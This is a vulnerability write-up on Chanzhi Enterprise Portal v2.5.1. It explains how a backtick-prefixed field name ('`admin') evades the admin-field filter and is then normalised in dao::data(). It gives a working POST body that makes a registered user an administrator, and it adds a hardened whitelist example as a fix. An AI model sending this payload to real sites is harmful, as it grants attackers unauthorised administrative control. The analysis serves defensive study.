
Chanzhi (蝉知) Enterprise Portal System v2.5.1: bypassing the patch to continue injecting – Website

/system/module/user/model.php

    public function update($account)
    {
        /* If the user wants to change his password. */
        if($this->post->password1 != false)
        {
            $this->checkPassword();
            if(dao::isError()) return false;

            $password  = $this->createPassword($this->post->password1, $account);
            $this->post->set('password', $password);
        }

        $user = fixer::input('post')
            ->cleanInt('imobile, qq, zipcode')
            ->setDefault('admin', 'no')
            ->remove('ip, account, join, visits')
            ->removeIF(RUN_MODE != 'admin', 'admin')
            ->get();

        return $this->dao->update(TABLE_USER)
            ->data($user, $skip = 'password1,password2')
            ->autoCheck()
            ->batchCheck($this->config->user->require->edit, 'notempty')
            ->check('email', 'email')
            ->check('email', 'unique', "account!='$account'")
            ->checkIF($this->post->gtalk != false, 'gtalk', 'email')
            ->where('account')->eq($account)
            ->exec();
    }

The fixer class does check the admin field (removeIF drops the key named exactly "admin" when RUN_MODE is not 'admin'). Now look at data() in
/system/lib/dao/dao.class.php

    public function data($data, $skipFields = '')
    {
        $this->data = $data;
        if($skipFields) $skipFields = ',' . str_replace(' ', '', $skipFields) . ',';

        foreach($data as $field => $value)
        {
            $field = str_replace('`', '', $field);
            $field = str_replace(',', '', $field);
            if(strpos($skipFields, ",$field,") !== false) continue;
            $this->sql .= "`$field` = " . $this->quote($value) . ',';
        }
        $this->sql = rtrim($this->sql, ',');    // Remove the last ','.
        return $this;
    }

data() strips the ` character from every field name.

So if we submit the field as `admin, it passes fixer's check (the key is "`admin", not "admin"); once it reaches data() the backtick is stripped and the name is restored to admin,

which results in escalation to administrator privileges.

A registered user edits their profile and POSTs

realname=aaaaaa’&email=z%40qq.com&password1=&password2=&company=&address=&zipcode=&mobile=&phone=&`admin=super

and is promoted to administrator.
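To make the check/normalization mismatch concrete, here is an added PHP example (not Chanzhi's code) that models a fixer-style removeIF() and the vulnerable data() loop next to a hardened builder that refuses to rewrite field names and only accepts columns on an explicit whitelist. The function names and the whitelist are assumptions for illustration.

```php
<?php
// Added example, not code from Chanzhi. It models the mismatch from the post:
// a fixer-style removeIF() compares field names verbatim, while a dao-style
// data() strips backticks before building SQL. Names are assumptions.

// Stand-in for fixer::removeIF(): drop the key only on an exact name match.
function removeIf(array $post, bool $condition, string $field): array
{
    if ($condition) unset($post[$field]);   // "`admin" !== "admin", so it survives
    return $post;
}

// Stand-in for the vulnerable dao::data(): normalizes the name after the check.
function buildSetVulnerable(array $data): string
{
    $parts = [];
    foreach ($data as $field => $value) {
        $field = str_replace(['`', ','], '', $field);   // "`admin" turns back into "admin"
        $parts[] = "`$field` = '" . addslashes($value) . "'";
    }
    return implode(', ', $parts);
}

// Hardened stand-in: never rewrite a field name; accept only plain identifiers
// that are on an explicit list of columns the caller may edit.
function buildSetHardened(array $data, array $allowed): string
{
    $parts = [];
    foreach ($data as $field => $value) {
        if (!preg_match('/^[A-Za-z_][A-Za-z0-9_]*$/', $field)) {
            throw new InvalidArgumentException("illegal field name: $field");
        }
        if (!in_array($field, $allowed, true)) {
            throw new InvalidArgumentException("field not editable: $field");
        }
        $parts[] = "`$field` = '" . addslashes($value) . "'";
    }
    return implode(', ', $parts);
}

// Constructed POST body shaped like the one in the post.
$post     = ['realname' => 'aaaaaa', 'email' => 'z@qq.com', '`admin' => 'super'];
$filtered = removeIf($post, true, 'admin');   // true stands for RUN_MODE != 'admin'
echo "vulnerable: ", buildSetVulnerable($filtered), "\n";   // SET clause still assigns admin
try {
    echo "hardened:   ", buildSetHardened($filtered, ['realname', 'email']), "\n";
} catch (InvalidArgumentException $e) {
    echo "hardened rejected request: ", $e->getMessage(), "\n";   // "`admin" fails the regex
}
```

The fix the example illustrates is to validate field names before any normalization (or drop normalization entirely), so the value checked by removeIF is the same value that reaches the SQL builder.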
